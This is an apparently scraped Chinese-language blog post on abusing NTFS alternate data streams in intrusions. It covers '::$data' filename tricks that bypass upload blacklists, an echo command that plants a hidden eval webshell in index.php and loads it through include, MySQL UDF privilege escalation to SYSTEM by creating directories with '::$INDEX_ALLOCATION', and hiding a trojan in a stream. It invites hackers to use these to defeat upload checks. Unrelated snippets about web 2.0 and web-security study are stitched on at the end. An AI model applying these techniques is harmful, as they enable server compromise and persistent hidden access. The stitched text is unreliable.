有關ads的簡單說明請看
可以看到ads在很久以前就被一些安全人員所關注,並且也提出了一些經典的利用,比如隱藏檔案,隱藏webshell(隨著這次爆出來的iis的許可權繞過,我們再次測試了一下ads在滲透中的利用方法,並發現了一些比較有意思的現象。這裡主要給大家分享幾個利用方法,大家可以發散思維,想辦法把ads利用起來。
詳見:注:這裡的許可權是ntfs目錄屬性的許可權,並非說是後台直接繞過。別誤會。
在測試中我們發現,如果上傳的檔案名字為:test.php::$data,會在伺服器上生成乙個test.php的檔案,其中內容和所上傳檔案內容相同,並被解析。假設我們需要上傳的檔案內容為:<?php phpinfo();?>下面是上傳是會出現的現象:
上傳的檔名
伺服器表面現象
生成的檔案內容
生成test.php
空test.php::$data
生成test.php
<?php phpinfo();?>
test.php::$index_allocation
生成test.php資料夾
生成0.jpg
生成aaa.jpg
<?php phpinfo();?>
ps: 上傳test.php:a.jpg的時候其實是在伺服器上正常生成了乙個資料流檔案,可以通過notepad test.php:a.jpg檢視內容,而test.php為空也是正常的。
根據第二個現象,我們可以bypass一些黑名單驗證。
後面我加\0測試的時候是想截斷後面的東西,但是發現windows會無視」/」」\」這兩個符號前面的東西,只識別這倆符號後的字串。
方法:在伺服器上echo乙個資料流檔案進去,比如index.php是網頁正常檔案,我們可以這樣子搞: echo ^<?php @eval(request[cmd])?^> > index.php:hidden.jpg
這樣子就生成了乙個不可見的shell hidden.jpg,常規的檔案管理器、type命令,dir命令、del命令發現都找不出那個hidden.jpg的。我們可以在另外乙個正常檔案裡把這個ads檔案include進去,<?php include(『index.php:hidden.jpg』)?>,這樣子就可以正常解析我們的一句話了。
4.udf提權中的利用
不詳細介紹udf提權了 具體可以參考:《udf提權方法和出現問題彙總》
udf提權tips:如果資料庫使用者對資料庫mysql(注意指的是資料庫裡的預設庫mysql)具有insert和delete許可權,就可以建立載入自定義函式。而又由於mysql是以system許可權執行在windows主機上,所以這個時候我們就可以通過自定義函式以system許可權執行命令了。
mysql 5.1以上(現在都5.6版本了,估計老版的不常見了。),在載入自定義函式的dll時,要求目錄必須是mysql目錄下的lib\plugin\目錄。直接匯入c:\windows\system32這種目錄是載入不了dll的,也就沒辦法creat function。但是可悲的是mysql 5.1之後的版本在安裝的時候是預設不存在lib\plugin目錄的,除非你安裝的是完整版(官方的那種200多m的)。
還有一些情況,比如:你獲取webshell了,但是webshell許可權被限制的很死,根本沒辦法新建lib\plugin目錄,或者你根本就沒有webshell,只有乙個mysql的弱口令。91ri.org在以前估計就是只有放棄了,但是利用ads我們則可以bypass掉這個限制。下面是乙個demo
(1)查詢mysql的plugin目錄:
但是我們可以發現其實伺服器並沒有那個目錄:
(2) 嘗試直接將dll導進去,
為了方便演示,我們隨便匯入乙個txt,具體怎麼通過unhex 和into dumpfile函式在mysql裡匯入dll,請看文章:
目錄不存在,肯定導不進去。
(3)利用ads突破限制建立目錄
執行的命令是:
default12
345mysql>select'it is dll'into dumpfile'c:\\program files (x86)\\mysql\\mysql s
erver 5.1\\lib::$index_allocation';
error3(hy000):error writing file'c:\program files (x86)\mysql\mysql server 5.1\lib::$index_allocation'(errcode:22)
發現繼續爆出錯誤,但是回到伺服器的目錄上:
同樣的方法,新建乙個plugin目錄
再往下就好辦了,跟其他udf提權乙個樣。
隱藏好辦,直接在cmd裡面執行命令: type muma.ext test.txt:muma.exe
winrar的自解壓木馬我還是覺得不靠譜,畢竟字尾是exe,如果目標連這個都確定不了,那還不如直接發muma.exe。所以這個利用我也沒怎麼研究了。
注:資料流中如果是可執行檔案,用start命令呼叫時,需要在win xp 和2003環境下,win7下失敗。
各位黑闊可以發揮自己的想象,利用ads說不定可以bypass當前大部分的上傳驗證哦~~如果各位發現什麼好玩的,還請多多賜教~
web2 0帶來的狂潮
這是乙個思維激盪的年代,一剎那靈光閃耀鑄就的輝煌足以慰藉終生,我們只需奮力前行,必能抵達理想彼岸。越來越多的聰明人加入進了這個利用概念搶錢的行列,第一次聽到 百萬網頁 時,真是感覺不知所謂,可是人家居然火了,居然賺了,難道是那些砸錢的人更加不知所謂?於是開始反思,和乙個哥們總結道 這是在掙傻x的錢....
Web安全 Web通訊
協議 url http 統一資源定位符 uniform resource locator 支援多種協議 http ftp 定位伺服器的資源 schema host port path query string anchor schema 底層協議 如 http https ftp host 伺服器的...
安全測試,web安全
web分為好幾層,一圖勝千言 完全沒有基礎我該從哪下手?完全沒有基礎學習 web 安全是件比較難的事情,所以我給出的最小的方案和最少的建議。工具 先用 awvs 掃幾個測試 大體了解一下 把掃到的漏洞復現,了解怎麼利用,主要了解 xsssql 注入 遠端 執行 開發 書籍 細說 php 實踐 使用 ...